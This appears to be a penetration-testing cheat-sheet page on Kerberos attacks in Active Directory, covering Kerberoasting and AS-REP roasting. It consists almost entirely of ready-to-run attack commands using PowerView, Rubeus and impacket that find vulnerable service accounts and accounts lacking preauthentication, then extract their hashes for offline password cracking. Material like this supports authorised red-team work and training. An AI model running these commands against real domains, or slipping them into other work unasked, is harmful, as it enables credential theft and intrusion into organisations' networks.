Skip to main content

Kerberos Attacks

Kerberoasting

Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password.

Vulnerability detection

PowerView

Import-Module .\PowerView.ps1
Get-DomainUser -SPN

Windows

PowerView

Import-Module .\PowerView.ps1
Invoke-Kerberoast

Rubeus

.\Rubeus.exe kerberoast /nowrap

Linux

impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -no-pass

AS-REP Roasting

Do not require Kerberos preauthentication

Windows

  • PowerView Manual
Get-ADUser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
  • PowerView Auto
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
  • Rubeus
.\Rubeus.exe asreproast /user:full.name /domain:domain.local /dc:dc01.domain.local

Linux

impacket-GetNPUsers domain.local/ -no-pass -request -k -usersfile users.txt